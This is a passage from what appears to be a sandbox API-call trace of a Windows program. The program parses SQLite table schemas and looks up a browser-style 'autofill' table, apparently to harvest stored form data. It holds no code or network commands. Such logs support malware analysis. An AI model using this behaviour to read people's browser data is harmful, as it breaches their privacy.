(lpFirst="name VARCHAR", lpSrch=" ") returned=" VARCHAR" [0591.060] lstrlenA (lpString="name") returned 4 [0591.060] lstrcmpiA (lpString1="name", lpString2="CONSTRAINT") returned 1 [0591.060] lstrcmpiA (lpString1="name", lpString2="CONSTRAINT") returned 1 [0591.060] lstrcmpiA (lpString1="name", lpString2="CONSTRAINT") returned 1 [0591.060] lstrcmpiA (lpString1="name", lpString2="CONSTRAINT") returned 1 [0591.060] lstrcmpiA (lpString1="name", lpString2="CONSTRAINT") returned 1 [0591.060] lstrcmpiA (lpString1="name", lpString2="name") returned 0 [0591.060] lstrcmpiA (lpString1="name", lpString2="value") returned -1 [0591.060] lstrlenA (lpString=" value VARCHAR") returned 14 [0591.060] StrStrIA (lpFirst="value VARCHAR", lpSrch=" ") returned=" VARCHAR" [0591.060] lstrlenA (lpString="value") returned 5 [0591.060] lstrcmpiA (lpString1="value", lpString2="CONSTRAINT") returned 1 [0591.060] lstrcmpiA (lpString1="value", lpString2="CONSTRAINT") returned 1 [0591.060] lstrcmpiA (lpString1="value", lpString2="CONSTRAINT") returned 1 [0591.060] lstrcmpiA (lpString1="value", lpString2="CONSTRAINT") returned 1 [0591.060] lstrcmpiA (lpString1="value", lpString2="CONSTRAINT") returned 1 [0591.060] lstrcmpiA (lpString1="value", lpString2="name") returned 1 [0591.060] lstrcmpiA (lpString1="value", lpString2="value") returned 0 [0591.060] lstrlenA (lpString=" value_lower VARCHAR") returned 20 [0591.060] StrStrIA (lpFirst="value_lower VARCHAR", lpSrch=" ") returned=" VARCHAR" [0591.060] lstrlenA (lpString="value_lower") returned 11 [0591.060] lstrcmpiA (lpString1="value_lower", lpString2="CONSTRAINT") returned 1 [0591.060] lstrcmpiA (lpString1="value_lower", lpString2="CONSTRAINT") returned 1 [0591.060] lstrcmpiA (lpString1="value_lower", lpString2="CONSTRAINT") returned 1 [0591.060] lstrcmpiA (lpString1="value_lower", lpString2="CONSTRAINT") returned 1 [0591.060] lstrcmpiA (lpString1="value_lower", lpString2="CONSTRAINT") returned 1 [0591.060] lstrcmpiA (lpString1="value_lower", lpString2="name") returned 1 [0591.060] lstrcmpiA (lpString1="value_lower", lpString2="value") returned 1 [0591.060] lstrlenA (lpString=" date_created INTEGER DEFAULT 0") returned 31 [0591.060] StrStrIA (lpFirst="date_created INTEGER DEFAULT 0", lpSrch=" ") returned=" INTEGER DEFAULT 0" [0591.060] lstrlenA (lpString="date_created") returned 12 [0591.060] lstrcmpiA (lpString1="date_created", lpString2="CONSTRAINT") returned 1 [0591.060] lstrcmpiA (lpString1="date_created", lpString2="CONSTRAINT") returned 1 [0591.060] lstrcmpiA (lpString1="date_created", lpString2="CONSTRAINT") returned 1 [0591.060] lstrcmpiA (lpString1="date_created", lpString2="CONSTRAINT") returned 1 [0591.060] lstrcmpiA (lpString1="date_created", lpString2="CONSTRAINT") returned 1 [0591.060] lstrcmpiA (lpString1="date_created", lpString2="name") returned -1 [0591.061] lstrcmpiA (lpString1="date_created", lpString2="value") returned -1 [0591.061] lstrlenA (lpString=" date_last_used INTEGER DEFAULT 0") returned 33 [0591.061] StrStrIA (lpFirst="date_last_used INTEGER DEFAULT 0", lpSrch=" ") returned=" INTEGER DEFAULT 0" [0591.061] lstrlenA (lpString="date_last_used") returned 14 [0591.061] lstrcmpiA (lpString1="date_last_used", lpString2="CONSTRAINT") returned 1 [0591.061] lstrcmpiA (lpString1="date_last_used", lpString2="CONSTRAINT") returned 1 [0591.061] lstrcmpiA (lpString1="date_last_used", lpString2="CONSTRAINT") returned 1 [0591.061] lstrcmpiA (lpString1="date_last_used", lpString2="CONSTRAINT") returned 1 [0591.061] lstrcmpiA (lpString1="date_last_used", lpString2="CONSTRAINT") returned 1 [0591.061] lstrcmpiA (lpString1="date_last_used", lpString2="name") returned -1 [0591.061] lstrcmpiA (lpString1="date_last_used", lpString2="value") returned -1 [0591.061] lstrlenA (lpString=" count INTEGER DEFAULT 1") returned 24 [0591.061] StrStrIA (lpFirst="count INTEGER DEFAULT 1", lpSrch=" ") returned=" INTEGER DEFAULT 1" [0591.061] lstrlenA (lpString="count") returned 5 [0591.061] lstrcmpiA (lpString1="count", lpString2="CONSTRAINT") returned 1 [0591.061] lstrcmpiA (lpString1="count", lpString2="CONSTRAINT") returned 1 [0591.061] lstrcmpiA (lpString1="count", lpString2="CONSTRAINT") returned 1 [0591.061] lstrcmpiA (lpString1="count", lpString2="CONSTRAINT") returned 1 [0591.061] lstrcmpiA (lpString1="count", lpString2="CONSTRAINT") returned 1 [0591.061] lstrcmpiA (lpString1="count", lpString2="name") returned -1 [0591.061] lstrcmpiA (lpString1="count", lpString2="value") returned -1 [0591.061] lstrlenA (lpString=" PRIMARY KEY (name") returned 18 [0591.061] StrStrIA (lpFirst="PRIMARY KEY (name", lpSrch=" ") returned=" KEY (name" [0591.061] lstrlenA (lpString="PRIMARY") returned 7 [0591.061] lstrcmpiA (lpString1="PRIMARY", lpString2="CONSTRAINT") returned 1 [0591.061] lstrcmpiA (lpString1="PRIMARY", lpString2="CONSTRAINT") returned 1 [0591.061] lstrcmpiA (lpString1="PRIMARY", lpString2="CONSTRAINT") returned 1 [0591.061] lstrcmpiA (lpString1="PRIMARY", lpString2="CONSTRAINT") returned 1 [0591.061] lstrcmpiA (lpString1="PRIMARY", lpString2="CONSTRAINT") returned 1 [0591.061] lstrcmpiA (lpString1="PRIMARY", lpString2="name") returned 1 [0591.061] lstrcmpiA (lpString1="PRIMARY", lpString2="value") returned -1 [0591.061] lstrlenA (lpString=" value))") returned 8 [0591.061] StrStrIA (lpFirst="value))", lpSrch=" ") returned 0x0 [0591.061] IStream:LockRegion (This=0x63a0a8, libOffset=0x2000, cb=0x0, dwLockType=0x0) returned 0x0 [0591.061] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.061] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.061] IStream:LockRegion (This=0x63a0a8, libOffset=0x2000, cb=0x0, dwLockType=0x0) returned 0x0 [0591.061] IStream:SetSize (This=0x63a0a8, libNewSize=0x52d9f7) returned 0x0 [0591.061] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.061] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.061] IStream:LockRegion (This=0x63a0a8, libOffset=0x2001, cb=0x0, dwLockType=0x0) returned 0x0 [0591.061] IStream:SetSize (This=0x63a0a8, libNewSize=0x52d9f6) returned 0x0 [0591.061] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.061] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.061] IStream:LockRegion (This=0x63a0a8, libOffset=0x2003, cb=0x0, dwLockType=0x0) returned 0x0 [0591.061] IStream:SetSize (This=0x63a0a8, libNewSize=0x52d9f6) returned 0x0 [0591.061] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.061] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.061] IStream:LockRegion (This=0x63a0a8, libOffset=0x2005, cb=0x0, dwLockType=0x0) returned 0x0 [0591.061] IStream:SetSize (This=0x63a0a8, libNewSize=0x52d9f6) returned 0x0 [0591.061] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.061] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.061] IStream:LockRegion (This=0x63a0a8, libOffset=0x2007, cb=0x0, dwLockType=0x0) returned 0x0 [0591.061] IStream:SetSize (This=0x63a0a8, libNewSize=0x52d9f7) returned 0x0 [0591.061] LocalAlloc (uFlags=0x40, uBytes=0x10080) returned 0x2f0f880 [0591.062] LocalFree (hMem=0x2f0f880) returned 0x0 [0591.062] LocalFree (hMem=0x58d840) returned 0x0 [0591.062] LocalFree (hMem=0x58d970) returned 0x0 [0591.062] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.062] LocalFree (hMem=0x58d548) returned 0x0 [0591.062] LocalFree (hMem=0x2edb848) returned 0x0 [0591.062] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.062] IStream:LockRegion (This=0x63a0a8, libOffset=0x6459, cb=0x0, dwLockType=0x0) returned 0x0 [0591.062] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.062] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.062] IStream:LockRegion (This=0x63a0a8, libOffset=0x6459, cb=0x0, dwLockType=0x0) returned 0x0 [0591.062] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.062] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.062] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.062] IStream:LockRegion (This=0x63a0a8, libOffset=0x645a, cb=0x0, dwLockType=0x0) returned 0x0 [0591.062] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.062] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2edb848 [0591.062] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da74 | out: ppstm=0x52da74*=0x63a0f8) returned 0x0 [0591.062] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.062] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.062] IStream:LockRegion (This=0x63a0a8, libOffset=0x645b, cb=0x0, dwLockType=0x0) returned 0x0 [0591.062] IStream:SetSize (This=0x63a0a8, libNewSize=0x2edb848) returned 0x0 [0591.062] IStream:Commit (This=0x63a0f8, grfCommitFlags=0x2edb848) returned 0x0 [0591.062] LocalFree (hMem=0x2edb848) returned 0x0 [0591.062] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.062] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.062] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.062] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.062] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.062] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.062] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ffd8 [0591.062] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.062] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.062] IStream:LockRegion (This=0x63a0f8, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0591.063] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0591.063] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0591.063] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0591.063] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0591.063] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.063] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0591.063] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0591.063] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.063] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d548 [0591.063] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.063] LocalAlloc (uFlags=0x40, uBytes=0x9b) returned 0x5d1a20 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0xb, cb=0x0, dwLockType=0x0) returned 0x0 [0591.063] IStream:SetSize (This=0x63a0f8, libNewSize=0x5d1a20) returned 0x0 [0591.063] LocalAlloc (uFlags=0x40, uBytes=0xa3) returned 0x63ff30 [0591.063] LocalFree (hMem=0x5d1a20) returned 0x0 [0591.063] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0x26, cb=0x0, dwLockType=0x0) returned 0x0 [0591.063] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.063] LocalAlloc (uFlags=0x40, uBytes=0x90) returned 0x58d8d8 [0591.063] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0f8, libOffset=0x2e, cb=0x0, dwLockType=0x0) returned 0x0 [0591.063] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da13) returned 0x0 [0591.063] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0591.063] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0591.063] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.063] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.063] lstrcmpiA (lpString1="sqlite_autoindex_autofill_1", lpString2="autofill") returned 1 [0591.063] LocalFree (hMem=0x58d548) returned 0x0 [0591.063] LocalFree (hMem=0x63ff30) returned 0x0 [0591.063] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.063] LocalFree (hMem=0x58d970) returned 0x0 [0591.063] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.063] LocalFree (hMem=0x56ff38) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0a8, libOffset=0x632b, cb=0x0, dwLockType=0x0) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0a8, libOffset=0x632b, cb=0x0, dwLockType=0x0) returned 0x0 [0591.063] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.063] IStream:LockRegion (This=0x63a0a8, libOffset=0x632c, cb=0x0, dwLockType=0x0) returned 0x0 [0591.063] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.063] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2edb848 [0591.063] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da74 | out: ppstm=0x52da74*=0x63a0f8) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0a8, libOffset=0x632d, cb=0x0, dwLockType=0x0) returned 0x0 [0591.064] IStream:SetSize (This=0x63a0a8, libNewSize=0x2edb848) returned 0x0 [0591.064] IStream:Commit (This=0x63a0f8, grfCommitFlags=0x2edb848) returned 0x0 [0591.064] LocalFree (hMem=0x2edb848) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.064] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.064] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0591.064] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0591.064] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0591.064] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0591.064] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0591.064] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.064] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ffd8 [0591.064] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0591.064] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.064] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d970 [0591.064] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.064] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d8d8 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0xb, cb=0x0, dwLockType=0x0) returned 0x0 [0591.064] IStream:SetSize (This=0x63a0f8, libNewSize=0x58d8d8) returned 0x0 [0591.064] LocalAlloc (uFlags=0x40, uBytes=0x95) returned 0x570078 [0591.064] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.064] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x18, cb=0x0, dwLockType=0x0) returned 0x0 [0591.064] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.064] LocalAlloc (uFlags=0x40, uBytes=0x90) returned 0x58d8d8 [0591.064] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.064] IStream:LockRegion (This=0x63a0f8, libOffset=0x20, cb=0x0, dwLockType=0x0) returned 0x0 [0591.064] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da13) returned 0x0 [0591.064] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d548 [0591.064] LocalAlloc (uFlags=0x40, uBytes=0xad) returned 0x2ed9918 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x21, cb=0x0, dwLockType=0x0) returned 0x0 [0591.065] IStream:SetSize (This=0x63a0f8, libNewSize=0x2ed9918) returned 0x0 [0591.065] LocalAlloc (uFlags=0x40, uBytes=0xb5) returned 0x2ed7060 [0591.065] LocalFree (hMem=0x2ed9918) returned 0x0 [0591.065] LocalFree (hMem=0x56ff38) returned 0x0 [0591.065] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.065] lstrcmpiA (lpString1="autofill_name", lpString2="autofill") returned 1 [0591.065] LocalFree (hMem=0x58d970) returned 0x0 [0591.065] LocalFree (hMem=0x570078) returned 0x0 [0591.065] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.065] LocalFree (hMem=0x58d548) returned 0x0 [0591.065] LocalFree (hMem=0x2ed7060) returned 0x0 [0591.065] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0a8, libOffset=0x62b5, cb=0x0, dwLockType=0x0) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0a8, libOffset=0x62b5, cb=0x0, dwLockType=0x0) returned 0x0 [0591.065] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0a8, libOffset=0x62b6, cb=0x0, dwLockType=0x0) returned 0x0 [0591.065] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.065] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2edb848 [0591.065] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da74 | out: ppstm=0x52da74*=0x63a0f8) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0a8, libOffset=0x62b7, cb=0x0, dwLockType=0x0) returned 0x0 [0591.065] IStream:SetSize (This=0x63a0a8, libNewSize=0x2edb848) returned 0x0 [0591.065] IStream:Commit (This=0x63a0f8, grfCommitFlags=0x2edb848) returned 0x0 [0591.065] LocalFree (hMem=0x2edb848) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.065] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.065] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ffd8 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0591.065] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0591.065] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0591.065] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0591.065] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.065] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, 